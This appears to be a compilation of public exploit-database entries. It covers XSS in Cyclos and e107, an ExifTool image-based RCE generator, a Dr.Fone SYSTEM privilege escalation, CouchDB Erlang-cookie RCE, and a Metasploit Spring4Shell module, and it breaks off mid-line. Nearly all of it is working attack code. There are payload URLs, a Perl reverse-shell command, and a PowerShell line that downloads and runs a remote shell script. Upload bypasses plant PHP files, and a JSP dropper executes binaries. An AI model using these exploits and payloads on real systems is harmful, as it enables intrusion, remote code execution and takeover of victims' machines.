<pre><code># Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)<br /># Date: 17/04/2021<br /># Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services<br /># Vendor Homepage: https://www.cyclos.org/<br /># Version: Cyclos 4.14.7 (and prior)<br /># Tested on: Ubuntu<br /># CVE : CVE-2021-31673<br /><br /># Description: <br />A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.<br /><br /># Steps to reproduce: <br />An attacker sends a draft URL<br /><br />[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.<br /><br />When a victim opens the URL, XSS will be triggered.<br /><br /><br /><br />-----<br /><br /><br /># Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)<br /># Date: 18/04/2021<br /># Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services<br /># Vendor Homepage: https://www.cyclos.org/<br /># Version: Cyclos 4.14.7 (and prior)<br /># Tested on: Ubuntu<br /># CVE : CVE-2021-31674<br /><br /># Description: <br />Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.<br /><br /># Steps to reproduce: <br />An attacker sends a draft URL<br /><br />[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.<br /><br />When a victim opens the URL, XSS will be triggered.<br /><br /></code></pre>
<pre><code># Exploit Title: ExifTool 12.23 - Arbitrary Code Execution<br /># Date: 04/30/2022<br /># Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)<br /># Vendor Homepage: https://exiftool.org/<br /># Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip<br /># Version: 7.44-12.23<br /># Tested on: ExifTool 12.23 (Debian)<br /># CVE: CVE-2021-22204<br /># Source: https://github.com/UNICORDev/exploit-CVE-2021-22204<br /># Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image<br /><br />#!/usr/bin/env python3<br /><br /># Imports<br />import base64<br />import os<br />import subprocess<br />import sys<br /><br /># Class for colors<br />class color:<br /> red = '\033[91m'<br /> gold = '\033[93m'<br /> blue = '\033[36m'<br /> green = '\033[92m'<br /> no = '\033[0m'<br /><br /># Print UNICORD ASCII Art<br />def UNICORD_ASCII():<br /> print(rf"""<br />{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}<br />{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}<br />{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}<br />{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}<br /> """)<br /><br /># Print exploit help menu<br />def help():<br /> print(r"""UNICORD Exploit for CVE-2021-22204<br /><br />Usage:<br /> python3 exploit-CVE-2021-22204.py -c <command><br /> python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port><br /> python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]<br /> python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]<br /> python3 exploit-CVE-2021-22204.py -h<br /><br />Options:<br /> -c Custom command mode. Provide command to execute.<br /> -s Reverse shell mode. Provide local IP and port.<br /> -i Path to custom JPEG image. (Optional)<br /> -h Show this help menu.<br />""")<br /><br /># Run the exploit<br />def exploit(command):<br /><br /> UNICORD_ASCII()<br /><br /> # Create perl payload<br /> payload = "(metadata \"\c${"<br /> payload += command<br /> payload += "};\")"<br /><br /> print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}")<br /> print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}")<br /><br /> # Write payload to file<br /> payloadFile = open('payload','w')<br /> payloadFile.write(payload)<br /> payloadFile.close()<br /><br /> # Bzz compress file<br /> subprocess.run(['bzz', 'payload', 'payload.bzz'])<br /><br /> # Run djvumake<br /> subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])<br /><br /> if '-i' in sys.argv:<br /> imagePath = sys.argv[sys.argv.index('-i') + 1]<br /> subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])<br /><br /> else:<br /> # Smallest possible JPEG<br /> image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="<br /><br /> # Write smallest possible JPEG image to file<br /> with open("image.jpg", "wb") as img:<br /> img.write(base64.decodebytes(image))<br /><br /> # Write exiftool config to file<br /> config = (r"""<br /> %Image::ExifTool::UserDefined = (<br /> 'Image::ExifTool::Exif::Main' => {<br /> 0xc51b => {<br /> Name => 'HasselbladExif',<br /> Writable => 'string',<br /> WriteGroup => 'IFD0',<br /> },<br /> },<br /> );<br /> 1; #end<br /> """)<br /> configFile = open('exiftool.config','w')<br /> configFile.write(config)<br /> configFile.close()<br /><br /> # Exiftool config for output image<br /> subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])<br /><br /> # Delete leftover files<br /> os.remove("payload")<br /> os.remove("payload.bzz")<br /> os.remove("exploit.djvu")<br /> os.remove("exiftool.config")<br /><br /> # Print results<br /> print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n")<br /><br /> exit()<br /><br />if __name__ == "__main__":<br /><br /> args = ['-h','-c','-s','-i']<br /><br /> if args[0] in sys.argv:<br /> help()<br /><br /> elif args[1] in sys.argv and not args[2] in sys.argv:<br /> exec = sys.argv[sys.argv.index(args[1]) + 1]<br /> command = f"system(\'{exec}\')"<br /> exploit(command)<br /><br /> elif args[2] in sys.argv and not args[1] in sys.argv:<br /> localIP = sys.argv[sys.argv.index(args[2]) + 1]<br /> localPort = sys.argv[sys.argv.index(args[2]) + 2]<br /> command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};"<br /> exploit(command)<br /><br /> else:<br /> help()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)<br /># Date: 4/27/2022<br /># Exploit Author: Netanel Cohen & Tomer Peled<br /># Vendor Homepage: https://drfone.wondershare.net/<br /># Software Link: https://download.wondershare.net/drfone_full4008.exe<br /># Version: up to 12.0.7<br /># Tested on: Windows 10<br /># CVE : 2021-44595<br /># References: https://github.com/netanelc305/WonderShell<br /><br />#Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges.<br /><br />#!/bin/python3<br />import msgpackrpc<br /><br />LADDR = "192.168.14.129"<br />LPORT = 1338<br /><br />RADDR = "192.168.14.137"<br />RPORT = 12345<br /><br />param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"<br />client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))<br />result = client.call('system_s','powershell',param)<br /><br /># stty raw -echo; (stty size; cat) | nc -lvnp 1338<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)<br /># Date: 2022-01-21<br /># Exploit Author: Konstantin Burov, @_sadshade<br /># Software Link: https://couchdb.apache.org/<br /># Version: 3.2.1 and below<br /># Tested on: Kali 2021.2<br /># Based on 1F98D's Erlang Cookie - Remote Code Execution<br /># Shodan: port:4369 "name couchdb at"<br /># CVE: CVE-2022-24706<br /># References:<br /># https://habr.com/ru/post/661195/<br /># https://www.exploit-db.com/exploits/49418<br /># https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/<br /># https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce<br /># <br />#<br />#!/usr/local/bin/python3<br /><br />import socket<br />from hashlib import md5<br />import struct<br />import sys<br />import re<br />import time<br /><br />TARGET = ""<br />EPMD_PORT = 4369 # Default Erlang distributed port<br />COOKIE = "monster" # Default Erlang cookie for CouchDB <br />ERLNAG_PORT = 0<br />EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list<br /><br /># Some data:<br />NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"<br />CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"<br />CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"<br />CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"<br /><br /><br />def compile_cmd(CMD):<br /> MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"<br /> MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"<br /> MSG += struct.pack(">H", len(CMD))<br /> MSG += bytes(CMD, 'ascii')<br /> MSG += b'jw\x04user'<br /> PAYLOAD = b'\x70' + CTRL_DATA + MSG<br /> PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD<br /> return PAYLOAD<br /><br />print("Remote Command Execution via Erlang Distribution Protocol.\n")<br /><br />while not TARGET:<br /> TARGET = input("Enter target host:\n> ")<br /><br /># Connect to EPMD:<br />try:<br /> epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> epm_socket.connect((TARGET, EPMD_PORT))<br />except socket.error as msg:<br /> print("Couldnt connect to EPMD: %s\n terminating program" % msg)<br /> sys.exit(1)<br /> <br />epm_socket.send(EPM_NAME_CMD) #request Erlang nodes<br />if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK<br /> data = epm_socket.recv(1024)<br /> data = data[0:len(data) - 1].decode('ascii')<br /> data = data.split("\n")<br /> if len(data) == 1:<br /> choise = 1<br /> print("Found " + data[0])<br /> else:<br /> print("\nMore than one node found, choose which one to use:")<br /> line_number = 0<br /> for line in data:<br /> line_number += 1<br /> print(" %d) %s" %(line_number, line))<br /> choise = int(input("\n> "))<br /> <br /> ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])<br />else:<br /> print("Node list request error, exiting")<br /> sys.exit(1)<br />epm_socket.close()<br /><br /># Connect to Erlang port:<br />try:<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.connect((TARGET, ERLNAG_PORT))<br />except socket.error as msg:<br /> print("Couldnt connect to Erlang server: %s\n terminating program" % msg)<br /> sys.exit(1)<br /> <br />s.send(NAME_MSG)<br />s.recv(5) # Receive "ok" message<br />challenge = s.recv(1024) # Receive "challenge" message<br />challenge = struct.unpack(">I", challenge[9:13])[0]<br /><br />#print("Extracted challenge: {}".format(challenge))<br /><br /># Add Challenge Digest<br />CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")<br /> + bytes(str(challenge), "ascii")).digest()<br />s.send(CHALLENGE_REPLY)<br />CHALLENGE_RESPONSE = s.recv(1024)<br /><br />if len(CHALLENGE_RESPONSE) == 0:<br /> print("Authentication failed, exiting")<br /> sys.exit(1)<br /><br />print("Authentication successful")<br />print("Enter command:\n")<br /><br />data_size = 0<br />while True:<br /> if data_size <= 0:<br /> CMD = input("> ")<br /> if not CMD:<br /> continue<br /> elif CMD == "exit":<br /> sys.exit(0)<br /> s.send(compile_cmd(CMD))<br /> data_size = struct.unpack(">I", s.recv(4))[0] # Get data size<br /> s.recv(45) # Control message<br /> data_size -= 45 # Data size without control message<br /> time.sleep(0.1)<br /> elif data_size < 1024: <br /> data = s.recv(data_size)<br /> #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))<br /> time.sleep(0.1)<br /> print(data.decode())<br /> data_size = 0<br /> else: <br /> data = s.recv(1024)<br /> #print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))<br /> time.sleep(0.1)<br /> print(data.decode(),end = '')<br /> data_size -= 1024<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities<br /># Date: 30/04/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: snup.php@gmail.com<br /># Vendor Homepage: https://e107.org/<br /># Software Link: https://e107.org/download<br /># Version: 3.2.1<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />### XSS Reflected - Via adding comment (Authenticated)<br /><br /># POC<br />Request:<br />GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Tue, 14 Dec 2021 08:02:42 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "71d7966eaa95fd8ac14da8baf3e0785d"<br />Content-Length: 25059<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br />[...]<br /><div class='media' ><br /><form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' ><br />[...]<br /><br />User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field<br /><br />image.png<br /><br /><br />### Upload restriction bypass (Authenticated [Admin]) + Stored Xss.<br /><br />Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file)<br />image->media manager->upload a file->Image/File URL<br />admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg<br /><br /># POC<br /><br />Request:<br />POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 90<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img<br />Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: iframe<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Tue, 14 Dec 2021 02:06:14 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "06ed5ef56b0f736995112cafd77e9ec0"<br />Content-Length: 20878<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br /><br /><!doctype html><br /><html lang="en"><br /><head><br /><title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr<br />[...]<br /><div class='well clearfix media-carousel-item-container'><br /><a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span><br /></a><br />[...]<br /><br />image.png<br /><br /><br />### Upload restriction bypass (Authenticated [Admin])+RCE<br /><br />Upload and execute .PHP file<br />Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory.<br /><br />image.png<br /><br /><br />Media Manager-> Media Upload/Import -> From a remote location<br /><br /># POC<br /><br />Request<br />POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 109<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import<br />Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Tue, 14 Dec 2021 09:02:08 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "5b9621fc78893e36034b14f841f840f8"<br />Content-Length: 26075<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br /><br /><!doctype html><br /><html lang="en"><br /><head><br /><title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr<br />[...]<br /><br />We can see uploaded PHP file on the server side.<br /><br />image.png<br /><br /><br />cmd.php file source:<br /><br /><?php<br />system('whoami');<br />?><br /><br />image.png<br /><br /><br />### Upload restriction bypass (Authenticated [Admin])+ Server file override<br /><br />Attacker can override example top.php file in the main directory of web application.<br />Original file top.php in server:<br />image.png<br /><br /><br />We can override file via following upload functionality:<br />Media Manager-> Media Upload/Import -> From a remote location<br /><br /># POC<br /><br />Request:<br />POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: pl,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 109<br />Origin: http://127.0.0.1<br />Connection: close<br />Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import<br />Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Tue, 14 Dec 2021 09:20:10 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "5b9621fc78893e36034b14f841f840f8"<br />Content-Length: 26075<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br />[...]<br /><br />top.php file content was tampered:<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ManualRanking # It's going to manipulate the Class Loader<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::EXE<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',<br /> 'Description' => %q{<br /> Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above<br /> and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable<br /> to remote code execution due to an unsafe data binding used to populate an object from request parameters<br /> to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the<br /> org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:<br /> class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can<br /> gain remote code execution.<br /> },<br /> 'Author' => [<br /> 'vleminator <vleminator[at]gmail.com>'<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2022-22965'],<br /> ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],<br /> ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],<br /> ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']<br /> ],<br /> 'Platform' => %w[linux win],<br /> 'Payload' => {<br /> 'Space' => 5000,<br /> 'DisableNops' => true<br /> },<br /> 'Targets' => [<br /> [<br /> 'Java',<br /> {<br /> 'Arch' => ARCH_JAVA,<br /> 'Platform' => %w[linux win]<br /> },<br /> ],<br /> [<br /> 'Linux',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Platform' => 'linux'<br /> }<br /> ],<br /> [<br /> 'Windows',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Platform' => 'win'<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2022-03-31',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'AKA' => ['Spring4Shell', 'SpringShell'],<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),<br /> OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),<br /> OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),<br /> ]<br /> )<br /> register_advanced_options [<br /> OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])<br /> ]<br /> end<br /><br /> def jsp_dropper(file, exe)<br /> # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.<br /> dropper = <<~EOS<br /> <%@ page import=\"java.io.FileOutputStream\" %><br /> <%@ page import=\"java.util.Base64\" %><br /> <%@ page import=\"java.io.File\" %><br /> <%<br /> FileOutputStream oFile = new FileOutputStream(\"#{file}\", false);<br /> oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\"));<br /> oFile.flush();<br /> oFile.close();<br /> File f = new File(\"#{file}\");<br /> f.setExecutable(true);<br /> Runtime.getRuntime().exec(\"#{file}\");<br /> %><br /> EOS<br /><br /> dropper<br /> end<br /><br /> def modify_class_loader(method, opts)<br /> cl_prefix = 'class.module.classLoader'<br /><br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path.to_s),<br /> 'version' => '1.1',<br /> 'method' => method,<br /> 'headers' => {<br /> 'c1' => '<%', # %{c1}i replacement in payload<br /> 'c2' => '%>' # %{c2}i replacement in payload<br /> },<br /> "vars_#{method == 'GET' ? 'get' : 'post'}" => {<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload],<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],<br /> "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]<br /> }<br /> })<br /> end<br /><br /> def check_log_file<br /> print_status("#{peer} - Waiting for the server to flush the logfile")<br /> print_status("#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}")<br /><br /> succeeded = retry_until_true(timeout: 60) do<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(@jsp_file)<br /> })<br /><br /> res&.code == 200 && !res.body.blank?<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded<br /><br /> print_good("#{peer} - Log file flushed")<br /> end<br /><br /> # Fix the JSP payload to make it valid once is dropped<br /> # to the log file<br /> def fix(jsp)<br /> output = ''<br /> jsp.each_line do |l|<br /> if l =~ /<%.*%>/<br /> output << l<br /> elsif l =~ /<%/<br /> next<br /> elsif l =~ /%>/<br /> next<br /> elsif l.chomp.empty?<br /> next<br /> else<br /> output << "<% #{l.chomp} %>"<br /> end<br /> end<br /> output<br /> end<br /><br /> def create_jsp<br /> jsp = <<~EOS<br /> <%<br /> File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}");<br /> jsp.delete();<br /> %><br /> #{Faker::Internet.uuid}<br /> EOS<br /> if target['Arch'] == ARCH_JAVA<br /> jsp << fix(payload.encoded)<br /> else<br /> payload_exe = generate_payload_exe<br /> payload_filename = rand_text_alphanumeric(rand(4..7))<br /><br /> if target['Platform'] == 'win'<br /> payload_path = datastore['WritableDir'] + '\\' + payload_filename<br /> else<br /> payload_path = datastore['WritableDir'] + '/' + payload_filename<br /> end<br /><br /> jsp << jsp_dropper(payload_path, payload_exe)<br /> register_files_for_cleanup(payload_path)<br /> end<br /><br /> jsp<br /> end<br /><br /> def check<br /> @checkcode = _check<br /> end<br /><br /> def _check<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))<br /> )<br /><br /> return CheckCode::Unknown('Web server seems unresponsive') unless res<br /><br /> if res.headers.key?('Server')<br /> res.headers['Server'].match(%r{(.*)/([\d|.]+)$})<br /> else<br /> res.body.match(%r{Apache\s(.*)/([\d|.]+)})<br /> end<br /><br /> server = Regexp.last_match(1) || nil<br /> version = Rex::Version.new(Regexp.last_match(2)) || nil<br /><br /> return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)<br /><br /> vprint_status("Detected #{server} #{version} running")<br /><br /> if datastore['HTTP_METHOD'] == 'Automatic'<br /> # prefer POST over get to keep the vars out of the query string if possible<br /> methods = %w[POST GET]<br /> else<br /> methods = [ datastore['HTTP_METHOD'] ]<br /> end<br /><br /> methods.each do |method|<br /> vars = "vars_#{method == 'GET' ? 'get' : 'post'}"<br /> res = send_request_cgi(<br /> 'method' => method,<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> vars => { 'class.module.classLoader.DefaultAssertionStatus' => 